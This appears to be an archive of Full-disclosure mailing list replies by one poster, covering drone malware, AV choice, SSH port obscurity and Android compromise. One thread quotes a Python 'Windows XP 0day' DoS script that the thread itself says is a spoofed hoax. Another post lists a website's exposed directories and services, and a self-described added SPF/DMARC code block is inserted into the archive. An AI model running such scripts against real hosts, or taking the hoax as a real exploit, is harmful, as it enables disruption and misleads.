Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

2011-10-10 Thread Elazar Broad

The report states that they have been using flash drives for map
and video data transfer. The source is probably some flight
operator's personal drive which never came under the microscope,
that and "well...it's an *isolated* network so proper security
posture is moot" make for an easy target. I still like the fact
that real-time drone video can be viewed using SkyGrabber, don't
most local LEO use the same technology (albeit on a smaller scale)?
I'm sure many criminals and organized crime can afford a DVB-S
card...

My devalued .002

elazar

On Mon, 10 Oct 2011 13:36:23 -0400 "Thor (Hammer of God)"
 wrote:
>Consider the source.  It’s “someone close” to the operations, and
>that only according to this guy.  It could very well be a slot-
>puller in the casino across the street…   I’m always dubious of
>the reporting of this type of thing where the source is some
>“secret” person, and where there is never any ability to refute
>claims.
>
>t
>
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
>Sciberras
>Sent: Monday, October 10, 2011 7:05 AM
>To: Michael T
>Cc: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] “We keep wiping it off, and it
>keeps coming back”
>
>I'm talking more about their engineers than their network.
>
>If I had my network infected with a virus, I'd immediately deploy
>some form of logging/monitoring tool (eg, wireshark).
>
>Honestly, it all sounds like they're employing inexperienced
>engineers. Which is again strange, considering the field they're
>in.
>
>Regarding your bet, see that's already something. Why exactly
>can't they verify your bet? It isn't like viruses suddenly became
>invisible, is it?
>
>I'm just curious to these questions. It's strange to hear someone
>saying "we basically have no idea what's going on".
>
>
>On Mon, Oct 10, 2011 at 3:40 PM, Michael T
>mailto:mt2410...@gmail.com>> wrote:
>It's a network that's 'detached', or 'segregated', or whatevered
>from the rest of the world, so it's 'largely immune to viruses'.
>That likely means they have:
>1. NO logging
>2. NO anti-virus
>3. NO hardening
>
>The very fact that these systems are on a segregated network means
>they are probably more frail, and more susceptible to viruses,
>than a normal person's laptop.
>
>Immune to viruses...  What a crock of shit.  My bet is that it's
>coming from the planes.
>
>Mike
>On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras
>mailto:uuf6...@gmail.com>> wrote:
>http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/
>
>This is news to me.
>
>Moreover, I'm a bit confused as to how they don't track how it's
>coming back.
>I mean, how is it possible that no one stepped in and analyzed how
>the virus acts and where it came from?
>
>It sounds fishy if you ask me.
>
>Chris.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

2012-01-12 Thread Elazar Broad
"Sounds like this industry could benefit from these kids even more
since they are driving home the points you all are supposed to be
warning them about."

That's because these kids don't have mouths to feed and a paycheck to
worry about. Ethics and ethos are all very nice when you have nothing
to lose, all to gain and no one depending on you...

On Thursday, January 12, 2012 at 4:43 AM, Laurelai wrote:
> On 1/12/12 3:34 AM, doc mombasa wrote:
>> I don't know if you ever worked for a big corporate entity? like kovacs
>> wrote it's not about whether you can do it or not as an employee, it's
>> more about if your manager allows you the time to do it
>> pentesting doesn't change anything on the profits excel sheet
>> we can agree it looks bad when shit happens but they usually don't think
>> that far ahead
>> I tried once reporting a very simple sql injection flaw to my manager and
>> including a proposed fix which would take all of 5 minutes to implement
>> 18 months went by before that flaw was fixed because there was no profits
>> in allocating resources to fix it, and that webapp was the #1 money
>> generator for that company
>>
>> On 12 Jan 2012 10:29, Laurelai wrote:
>>> On 1/12/12 3:27 AM, doc mombasa wrote:
>>>> just one question: why should they hire the "skiddies" if most of them
>>>> only know how to fire up sqlmap or whatever current app is hot right
>>>> now? doesn't really seem like enough reason to hire anyone. besides, I'm
>>>> not buying the whole "they do it because they are angry at society"
>>>> plop. I've been there.. they do it for the lulz
>>>>
>>>> On 11 Jan 2012 06:18, Laurelai wrote:
>>>>> On 1/10/12 10:18 PM, Byron Sonne wrote:
>>>>>>> Don't piss off a talented adolescent with computer skills.
>>>>>> Amen! I love me some stylin' pwnage :)
>>>>>>
>>>>>> Whether they were skiddies or actual hackers, it's still amusing (and
>>>>>> frightening to some) that companies who really should know better, in
>>>>>> fact, don't.
>>>>>>
>>>>> And again, if companies hired these people, most of whom come from
>>>>> disadvantaged backgrounds and are self taught, they wouldn't have as
>>>>> much a reason to be angry anymore. Most of them feel like they don't
>>>>> have any real opportunities for a career and they are often right.
>>>>> Microsoft hired some kid who hacked their network, it is a safe bet he
>>>>> isn't going to be causing any trouble anymore. Talking about the trust
>>>>> issue, who would you trust more: the person who has all the certs and
>>>>> experience that told you your network was safe, or the 14 year old who
>>>>> proved him wrong? We all know if that kid had approached microsoft with
>>>>> his exploit in a responsible manner they would have outright ignored
>>>>> him, that's why this mailing list exists, because companies will ignore
>>>>> security issues until it bites them in the ass to save a buck. People
>>>>> are way too obsessed with having certifications that don't actually
>>>>> teach practical intrusion techniques. If a system is so fragile that
>>>>> teenagers can take it down with minimal effort then there is a serious
>>>>> problem with the IT security industry. Think about it: how long has sql
>>>>> injection been around? There is absolutely no excuse for being
>>>>> vulnerable to it. None whatsoever. These kids are showing people the
>>>>> truth about the state of security online and that is what's making
>>>>> people afraid of them. They aren't writing 0 days every week, they are
>>>>> using vulnerabilities that are public

Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

2012-04-17 Thread Elazar Broad

Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
a...@infosecinstitute.com does not designate 46.167.245.118 as
permitted sender)

Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk
(Postfix) with ESMTP id D4324C0
for ;Tue, 17 Apr 2012 07:58:09 +0100
(BST)

At least configure your SPF record policy to hard fail, and consider Domain 
Keys and/or DMARC.

elazar

On Tuesday, April 17, 2012 at 10:40 AM, a...@infosecinstitute.com wrote:
>Guys, this is a fake release, someone spoofed my email and sent this out
>as a joke to mock the wicd release from last week. Please note that if you
>click on the links, there is nothing there concerning this.
>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>>  Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python
>> # Windows XP denial of service 0day exploit discovered on 4.9.12 by
>> # InfoSec Institute student
>> # For full write up and description go to
>> # http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>> import sys
>> import os
>> import time
>> import getopt
>> import socket
>>
>> class Error(Exception):
>>     def __init__(self, error):
>>         self.errorStr = error
>>     def __str__(self):
>>         return repr(self.errorStr)
>>
>> class Exploit():
>>
>>     def __init__(self, targetHost, targetPort):
>>         self.targetHost = targetHost
>>         self.targetPort = targetPort
>>
>>     def exploit(self, targetHost, targetPort):
>>
>>         try:
>>             socket.inet_aton(targetHost)
>>             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>             s.connect((targetHost, targetPort))
>>         except socket.error:
>>             raise Error("Unable to exploit (Connect failed.)")
>>
>>         # exploit: the socket is already connected, so send() is used
>>         # rather than sendto() with an address
>>         try:
>>             s.send("\n\n\n")
>>         except:
>>             raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage():
>>     print "[!] Usage:"
>>     print "  ( -h, --help ):"
>>     print "      Print this message."
>>     print "  ( --targetHost= ): Target host."
>>     print "      --targetHost=127.0.0.1"
>>     print "  ( --targetPort= ): Target port."
>>     print "      --targetPort="
>>
>> def main():
>>     print "[$] Windows XP 0Day"
>>     try:
>>         opts, args = getopt.getopt(sys.argv[1:], "h",
>>                                    ["help", "targetHost=", "targetPort="])
>>     except getopt.GetoptError, err:
>>         # Print help information and exit:
>>         print '[!] Parameter error:' + str(err)
>>         # Will print something like "option -a not recognized"
>>         usage()
>>         sys.exit(0)
>>
>>     targetHost = None
>>     targetPort = None
>>     for opt, arg in opts:
>>         if opt in ("-h", "--help"):
>>             usage()
>>             sys.exit(0)
>>         elif opt == "--targetHost":
>>             targetHost = arg
>>         elif opt == "--targetPort":
>>             targetPort = arg
>>         else:
>>             # I would be assuming to say we'll never get here.
>>             print "[!] Parameter error."
>>             usage()
>>             sys.exit(0)
>>
>>     if not targetHost:
>>         print "[!] Parameter error: targetHost not set."
>>         usage()
>>         sys.exit(0)
>>
>>     if not targetPort:
>>         print "[!] Parameter error: targetPort not set."
>>         usage()
>>         sys.exit(0)
>>
>>     exploit = Exploit(targetHost, targetPort)
>>
>>     print "[*] Attempting to exploit:"
>>     try:
>>         exploit.exploit(targetHost, int(targetPort))
>>     except Error as error:
>>         print "[!] Exploit Error: %s" % (error.errorStr)
>>         exit(0)
>>     print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin
>> # the program.
>> if __name__ == '__main__':
>>     main()
>>
>>
>>
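The SPF point Elazar makes above, as an added example that is not code from the original thread or from any of its participants: a small SPF/DMARC evaluator that shows the softfail (~all) result the quoted Received-SPF header reports next to the hard-fail (-all) result and the disposition a DMARC policy would make a receiver apply. The SPF and DMARC records and the example.com names are assumed sample values; only the sending IP is taken from the quoted header, and DKIM (Domain Keys) is not modelled.

```python
"""Minimal SPF/DMARC evaluator (added example). It shows why a softfail
(~all) record lets a spoofed message through and how a hard-fail (-all)
record plus a DMARC policy changes the receiver's decision. Only the
ip4/ip6/all SPF mechanisms are handled; DKIM is not modelled."""
import ipaddress

# Constructed sample data. The sending IP is the one in the Received header
# quoted in the thread; the SPF and DMARC records are assumptions, not real
# DNS answers for any domain.
SENDER_IP = "46.167.245.118"
SPF_SOFTFAIL = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 ~all"
SPF_HARDFAIL = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8::/32 -all"
DMARC_REJECT = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"

# SPF qualifier prefixes (RFC 7208 section 4.6.2); "+" is the default.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def evaluate_spf(record, sender_ip):
    """Return pass/fail/softfail/neutral/none/permerror for sender_ip.

    Mechanisms that need DNS (include, a, mx, redirect, ...) are reported
    as permerror rather than guessed, so the result is never silently wrong."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"                      # no SPF record published
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.lower()
        if name == "all":                  # "all" always matches
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            try:
                network = ipaddress.ip_network(value, strict=False)
            except ValueError:
                return "permerror"         # malformed CIDR in the record
            if ip.version == network.version and ip in network:
                return QUALIFIERS[qualifier]
            continue
        return "permerror"                 # mechanism needs DNS; out of scope
    return "neutral"                       # nothing matched and no "all" term


def dmarc_disposition(dmarc_record, spf_result, spf_aligned=True):
    """Receiver action under the domain's DMARC policy, given the SPF result.

    With no DKIM signature, DMARC passes only on an aligned SPF pass; any
    other SPF result (softfail included) is handled by the p= tag."""
    tags = {}
    for item in dmarc_record.split(";"):
        key, sep, value = item.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return "deliver"                   # no policy: DMARC does not apply
    if spf_result == "pass" and spf_aligned:
        return "deliver"
    policy = tags.get("p", "none").lower()
    return {"none": "deliver", "quarantine": "quarantine",
            "reject": "reject"}.get(policy, "deliver")


def classify_message(spf_record, dmarc_record, sender_ip):
    """(spf_result, disposition) for one message from sender_ip."""
    spf_result = evaluate_spf(spf_record, sender_ip)
    return spf_result, dmarc_disposition(dmarc_record, spf_result)


if __name__ == "__main__":
    cases = (("softfail, no DMARC", SPF_SOFTFAIL, ""),
             ("hard fail + p=reject", SPF_HARDFAIL, DMARC_REJECT))
    for label, spf, dmarc in cases:
        print("%-22s -> %s" % (label, classify_message(spf, dmarc, SENDER_IP)))
```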

Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-23 Thread Elazar Broad

Most people charge for that, the least Juan could do is give you a
*free* "license" for his scamware (we know you want it ;) ).

Ah, the state of so-called "security" these days...it's
sad.

elazar

On Wed, 22 Jun 2011 23:38:06 -0400 adam  wrote:
>*cough*
>
>*Directory indexes enabled:*
>http://www.insecurityresearch.com/wp-includes/
>http://www.insecurityresearch.com/wp-content/uploads/
>http://www.insecurityresearch.com/wp-content/plugins/wp-pagenavi/
>http://www.insecurityresearch.com/wp-content/plugins/wp-postratings/
>
>*Path disclosure:*
>http://www.insecurityresearch.com/wp-content/themes/eVid/
>
>*Other:*
>
>   - Using outdated version of SSL
>   - Outdated SSL Certificate (2009)
>   - Outdated version of mod_frontpage (which may be vulnerable to
>a root
>   access exploit)
>   - At *least* a dozen broken links
>   - MySQL is exposed to the internet
>
>Blah blah blah. Some of these may or may not be serious but the
>fact is: it
>took less than 60 seconds to find all of it. Imagine what someone
>who is *
>really* bored could find. I think I'll pass on your oh so special
>*hacker*
> tool.



Re: [Full-disclosure] printers used for espionage

2011-07-12 Thread Elazar Broad


http://www.eff.org/issues/printers

On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison
 wrote:
>list,
>
>  Sometime ago I remember reading an article on printers being
>used to
>gain intelligence in an embassy  or government agency.  The
>printer
>had a modified firmware... Did anyone else read that?  Or was I
>dreaming again?
>
>  The recent articles about this tactic being used against the US
>reminded me of the covert printer surveillance program... but now
>I
>can find no mention of it.
>http://technology.newsplurk.com/2011/07/dhs-imported-gadgets-possibly-include.html
>
>-infotek
>



Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Elazar Broad
Ferenc,
 I got one as well a few weeks ago. I suspect you are correct in your 
assumption.

elazar

On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs  wrote:
>
>Hi,
>
>Anybody else got this message? I think they are "spamming" the
>subscribers/regular participants of the list.
>
>-- Forwarded message --
>From: steve ruskin 
>Date: Tue, Apr 24, 2012 at 9:56 AM
>Subject: Vulnerability research and exploit writing
>To: tyr...@gmail.com
>
>
>
>  Hi ,
>
>
>
>Trust all is well. I saw your experience in the field of 
>vulnerability and
>exploit research and we have a scheme in our company to 
>collaborate with
>researchers all over the world where we pay them on research done 
>by them.
>Our interest is exploits which run over Windows 7, Snow Leopard 
>with
>applications such MS Office, Adobe, Browsers, Media Player , 
>Notepad etc
>along with native OS exploits as well as iphone, blackberry 
>exploit. These
>exploits should be unpublished though the vulnerability may be 
>public. We
>also have requirements to help us do ASLR and DEP bypass for 
>exploits
>researched by us.
>
>
>
>Once you let us know about your skills and ideas we can provide 
>you with
>our empanelment form via which you can register. We will look 
>forward to
>your prompt response.
>
>
>Warm Regards,
>
>Steve Ruskin
>
>-- 
>Ferenc Kovács
>@Tyr43l - http://tyrael.hu


Re: [Full-disclosure] server security

2012-06-22 Thread Elazar Broad
+1

The less an attacker knows about your infrastructure the better, as long as you
are not solely relying on that obscurity to protect said infrastructure.
Consider this: the more an attacker has to poke around because you aren't
running certain services on their default port, or say disabling client
scripting on your .NET Regex validator so that the validation expression isn't
exposed in the page, the more noise said attacker is going to make while
performing reconnaissance, and the better the chance that they will be detected
by any detective controls that are in place.

My .0002

elazar

On Thursday, June 21, 2012 at 3:26 PM, Thor (Hammer of God) 
 wrote:
>
>I completely agree with Gage.  The way I see it, security through 
>obscurity is perfectly valid as long as the control remains 
>obscured.  I think the "anyone can just scan your ports" is 
>somewhat specious in that most (if not something like 99% or so 
>(unqualified opinion of course)) traffic is simply noise and scans 
>for standard ports.  This is particularly true when it matters 
>most: during a worm outbreak or a newly published vulnerability.  
>Attackers simply don't have the time nor the inclination to go 
>through and perform slow and loud scans when they can quickly move 
>on to the next target.  If 90% of the targets have services on the
>default ports, then it makes far more sense to just go after the
>easy targets.
>
>Perfect case-in-point is the recent RDP unpleasantness.   Non-
>standard port deployments were automatically removed from the
>target scans for 3389.  I don't see how anyone can argue against the
>security value of such a configuration.
>
>t  
>
>
>
>Timothy "Thor"  Mullen
>www.hammerofgod.com
>Thor's Microsoft Security Bible
>
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
>Sent: Thursday, June 21, 2012 9:25 AM
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] server security
>
>Well thats a bit of an iffy one. I'd say it IS a security measure, 
>albeit one that is solely effective if and only if compounded with 
>other measures.
>
>It's unlikely, but you never know, you just might miss out on a 
>nasty worm all because you werent running on a  default port one 
>day.
>
>On Thu, Jun 21, 2012 at 8:52 AM, Rob  
>wrote:
>> We need to make a distinction between security and obscurity 
>here. The only time changing ports actually hardens a service in 
>any way is when the port requires elevated rights to bind, 
>changing to 1025 for example removes the root requirement. Any 
>actual or theoretical vulnerabilities still exist. If somebody is 
>looking at your server, they'll find the port without much 
>trouble. Alternate ports can remove junk traffic from logs, so 
>there is a benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22, I don't 
>need to 
>> tell anyone how devastating it is if someone did actually get 
>access 
>> to that service. Putting it on some other port reduces your risk
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler 
> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables 
>blocks 
>>> everything, then only opens what it wants. I also use the 
>addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do 
>some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users 
>in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple 
>other things.
>>> It's only running on a linode512, so I don't have the ability 
>to set 
>>> up a ton of stuff; I also think that would make things more of 
>a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes 
>I 
>>> notice that there are a lot of requests from people scanning 
>for 
>>> common urls like wordpress/phpbb3/etc, what kind of 
>preventative measures exist for this?
>>>
>>>
>>> --
>>> Take care,
>>> Ty
>>> http://tds-solutions.net
>>> The aspen project: a barebones light-weight mud engine:
>>> http://code.google.com/p/aspenmud
>>> He that will not reason is a bigot; he that cannot reason is a 
>fool; 
>>> he that dares not reason is a slave.
>>>
>>>
>>> 
>-
>>> --- Securing Apache Web Server with 

Re: [Full-disclosure] looking for enterprise AV solution

2010-10-27 Thread Elazar Broad

+1 for Vipre, it's cheap (about $10 or less per seat, per year),
generally resource conscious and has pretty granular centralized policy
management, and last but not least, its detection and fp to fn ratio
is pretty solid. Aside from recent issues with its Outlook
plugin (which have been fixed) and some engine update deployment
issues on a handful of machines (there is a workaround), my overall
experience has been quite good.

On Wed, 27 Oct 2010 06:36:24 -0400 James Rankin
 wrote:
>Ditto on the belt and braces approach.
>
>I've had a lot of good experiences with Sunbelt's Vipre product.
>It is
>extremely easy to deploy and manage in the enterprise.
>
>On 27 October 2010 11:32, Jamie Riden 
>wrote:
>
>> On 26 October 2010 19:26, bk  wrote:
>> > (resending from correct account)
>> > On Oct 26, 2010, at 6:55 AM, Mikhail A. Utin wrote:
>> >
>> >> Folks,
>> >> We are looking an enterprise level AV-software . Any
>advising?
>> >
>> > Signature-based AV is a dead technology.  Updates don't get
>released
>> until hours after you're already infected, so all it really ends
>up doing is
>> being a resource-suck on your CPUs and hard-disk access.
>> >
>> > My recommendation:  Buy whatever has the highest composite
>score for ease
>> of management, limited resource consumption, and affordability.
>> >
>> > Anyone who says "get Vendor X" or "get Brand Y" without
>telling you what
>> selection criteria they used is a tool.  How do you know if what
>is
>> important to you was also important to them in making the
>selection?
>>
>> If you've got a decent perimeter, it should keep the threats out
>for
>> some time, but I tend to agree. AV these days is starting to be
>more
>> about detection than prevention - it will at least highlight
>that you
>> have a problem so you can deal with it. Think of it as part of
>your
>> intrusion detection if it helps.
>>
>> Oh, and somewhere I used to work ran two separate AV products on
>the
>> mail gateway, and then a third on desktops on servers. I suspect
>this
>> was more about licensing models (couldn't do per-seat for email
>as we
>> had >100k email addresses) than paranoia, but it did help out
>> considerably to have independent engines.
>>
>> cheers,
>>  Jamie
>> --
>> Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
>> http://uk.linkedin.com/in/jamieriden
>>
>>
>
>
>
>--
>"On two occasions...I have been asked, 'Pray, Mr Babbage, if you
>put into
>the machine wrong figures, will the right answers come out?' I am
>not able
>rightly to apprehend the kind of confusion of ideas that could
>provoke such
>a question."



Re: [Full-disclosure] virus in email RTF message MS OE almost disabled

2010-11-23 Thread Elazar Broad

Putting PhD, CISSP after your name combined with your original
request isn't going to get you much love on this list, but then
again, so much for the 30,000 ft bird's eye academic view of
security (and we wonder why the so called *industry* is such a
failure...).

Now for some practical advice that they probably didn't teach you
in your PhD class or in the Sybex (or whatever you used) CISSP book:
If you were running with admin privileges when you opened that
attachment, as with most modern malicious code, they are
*generally* not worth trying to clean (hint..hint blended threats).
Back up your stuff, DBAN the drive (zeros, 1 pass) and rebuild the
box.


elazar
On Tue, 23 Nov 2010 09:26:49 -0500 "Mikhail A. Utin"
 wrote:
>As we see, our list has a few (luckily just a few) unprofessional
>people thinking of themselves as gods, and hiding in such Russian-
>born domains. It's useless to engage in any discussion as they
>have too much time and will waste our time as well. And it's
>useless to explain ethics, security basics, and our experience as
>they are kiddies. Eventually they will grow ... may be.
>
>List, thank you very much
>
>Mikhail A. Utin, CISSP
>Information Security Analyst
>Commonwealth Care Alliance
>30 Winter St.
>Boston, MA
>TEL: (617) 426-0600 x.288
>FAX: (617) 249-2114
>http://www.commonwealthcare.org
>mu...@commonwealthcare.org
>
>
>-Original Message-
>From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
>Sent: Monday, November 22, 2010 4:52 PM
>To: Mikhail A. Utin
>Cc: full-disclosure@lists.grok.org.uk
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>Keep it on the list.  No need for private emails if you need
>assistance - give everyone a chance!
>
>My response was far more useful than your post - "I got pwned by
>an Office virus by opening an attachment in OE - What could it
>be??"  Jeeze dude.  And I didn't give any "adice" about "Noton."
>I said to get someone professional, which you *clearly* need to
>do.
>
>You should look up these guys:
>http://www.rubos.com/pisa.html
>
>Apparently they are Information System Security Professionals, and
>they are in the same town as you.  One even has a CISSP, so you
>KNOW that he knows what he is doing.  Funny thing is that he has
>the exact same name as you do.  What are the chances of that?  If
>these guys formed the company to sell services to businesses and
>individuals to comply with legal security and privacy
>requirements, then they should be able to figure out how to find
>an Office virus on XP, right?
>
>You can even join them as "Security professionals and experienced
>Information Sestems professionals are welcome."  I'm not sure what
>a "Sestems professional" is, but it must be very important work.
>
>Waste of time indeed.  Apple Stores are hiring "geniuses" for the
>holidays - even they know how to use XP and could help.
>
>t
>
>
>
>
>
>From: Mikhail A. Utin [mailto:mu...@commonwealthcare.org]
>Sent: Monday, November 22, 2010 1:26 PM
>To: Thor (Hammer of God)
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>Your email is useless. It is on my home PC. If you have better
>adice than using Noton SW, then please use your mind to get
>something minigful.
>If you can name the virus or where to find its instance, it would
>be a help. Otherwise do not waste you and my time.
>
>From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
>Sent: Monday, November 22, 2010 3:17 PM
>To: Mikhail A. Utin; full-disclosure@lists.grok.org.uk
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>You know, every time I start to get a bit of hope for what looks
>like an upward trend of businesses and organizations taking
>security seriously, I see crap like this.  Your organization is a
>Medicare prescription contractor with a national network of 61,022
>contracted pharmacies, and not only are you running unpatched
>versions of old OS's and opening email attachments because they
>"look OK," but you have to post to Full Disclosure asking help for
>trivial virus detection and removal advice?   Now that everyone on
>FD knows that you are vulnerable and that you open email
>attachments, you've probably just caused the organization to be
>pwned 9 ways from Sunday.
>
>To answer your question, call a professional and have them do it. 
>And in the future, don't send out emails like this from your
>organization email announcing the state of your security.  That's
>what Hotmail is for. 
>
>t
>
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Mikhail A. Utin
>Sent: Monday, November 22, 2010 7:18 AM
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] virus in email RTF message MS OE almost
>disabled
>
>Hello,
>Opening looking OK email message in my MS OE I've very likely got
>new kind of virus, which exploits MS Office flaw recently
>announced. Immediately after, my OE started consuming huge memo

Re: [Full-disclosure] Android and malware

2010-11-24 Thread Elazar Broad

It is definitely possible
(http://www.cultofmac.com/android-app-sends-personal-data-to-china/52929),
there have been several well known local root exploits (i.e.
http://c-skills.blogspot.com/2010/08/please-hold-line.html) for the
Android system, though it may be a busted proximity sensor. Just my .02...

On Tue, 23 Nov 2010 22:46:05 -0500 Eyeballing Weev
 wrote:
>Hello
>
>My friend is a public official and he believes his Android (HTC
>Dash)
>was bugged/infected by someone through a text message attachment.
>Has
>anyone seen anything commercially available or available online to
>do this?
>
>I don't know anything about smartphones but was wondering if
>anyone has
>Android experience with something like this. Does the Android have
>
>startup functions like Windows's Startup folder where we can
>investigate?
>
>The issues are a real bad echo, the phone acting really weird such
>as
>the battery life going bad and the phone lighting up on the table
>during
>it being idle.
>
>Thank you
>



Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.

elazar

On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
 wrote:
>Call me paranoid, but that sure would be a good way to spread a
>key logger!
>
>Gary B
>
>
>On 12/09/2010 07:25 AM, Christian Sciberras wrote:
>> Dave,
>>
>> That's ok. Glad to have helped out :)
>>
>> Cheers,
>> Chris.
>>
>>
>>
>> On Thu, Dec 9, 2010 at 1:07 PM, mrx > wrote:
>>
>> On 09/12/2010 10:26, Christian Sciberras wrote:
>> >> I tried installing this plugin to Firefox 3.6.12 in a
>virtualbox
>> XP32(SP3)
>> > environment and it is incompatible.
>> >> I may wait for an update to the plugin and analyse its
>behaviour,
>> > providing my curiosity doesn't wane in the meantime.
>>
>> > Alternatively, you can just decompress the XPI (it's in fact a
>zip) and
>> > inspect the js files and/or decompress any binaries.
>> > I suppose they are distributing some form of driver, so you'd
>find
>> > IDA/ollydbg useful.
>>
>>
>>
>> > Chris.
>>
>>
>> I extracted the files (various .js files and an exe) from the
>xpi.
>> The .js files version check and create an instance of
>keyscrambler.sys
>> with the current firefox window passed to it as an argument.
>>
>> I also extracted the contents of the executable; setup.exe.
>> Setup.exe contained various dll's and one sys file. I presumed
>this
>> sys file; keyscrambler.sys, is the driver and main component of
>this
>> addon.
>> To confirm I monitored the running of setup.exe.
>>
>> My presumption was correct: keyscrambler.sys is installed in the
>> system32 folder and is registered as an autostarting service,
>> although it is hidden from the services pane in computer management.
>>
>> This is where my "skills" bottom out. ASM is something I have
>not yet
>> got my head around.
>> I have a clue, but that's about all I do have... in time ;-)
>>
>> Thanks for your advice and input
>> regards
>> Dave
>>
>>
>> > On Thu, Dec 9, 2010 at 11:23 AM, mrx > > wrote:
>>
>> > On 08/12/2010 11:30, Tim Gurney wrote:
>>  Hi
>> 
>>  This seems to contradict itself somewhat. A plugin to Firefox should
>>  have no way to encrypt things at a driver level within the kernel; that
>>  would require installing separate software at the root level. A plugin
>>  should not be able to do this, and I would be VERY worried and surprised
>>  if it could, as it would mean bypassing the security of the OS.
>>
>> > I tried installing this plugin to Firefox 3.6.12 in a
>virtualbox
>> XP32(SP3)
>> > environment and it is incompatible.
>> > I may wait for an update to the plugin and analyse its
>behaviour,
>> providing
>> > my curiosity doesn't wane in the meantime.
>>
>> > I am not a professional, I do this kind of research as a hobby
>and for
>> > educational purposes, when I have some free time.
>>
>>
>>  Also if the driver is encrypting the key strokes and the
>plugin is
>>  decrypting, what about all the keystrokes that are not in
>> firefox, like
>>  email, word processing, programming, there is nothing to
>decrypt
>> these
>>  so you would end up only ever being able to use Firefox on the
>>  machine and nothing else ever again.
>>
>> > The devs do state that it only encrypts keystrokes in Firefox
>and
>> not other
>> > applications, although they do sell a version that supposedly
>works
>> > "in over 160 browsers and applications".
>> 
>>  Personally I would not touch this with a barge pole, and I would do
>>  a lot more digging and checking into this.
>>
>> > Yes, I am sceptical of claims, hence the post to this list.
>>
>>
>>
>>  regards
>> 
>>  Tim
>>
>>
>> > Thanks for your input
>> > Dave.
>>
>>
>> 
>>  On 08/12/10 11:12, mrx wrote:
>> > Hi list,
>> 
>> > Is anyone familiar with the firefox addon KeyScrambler?
>According to
>> > developers this encrypts keystrokes.
>> 
>> > Quote:
>> > "How KeyScrambler Works:
>> > When you type on your keyboard, the keys travel along a
>path
>> within the
>> > operating system before it arrives at your browser. Keyloggers
>plant
>> > themselves along this path and observe and record your
>> keystrokes. The
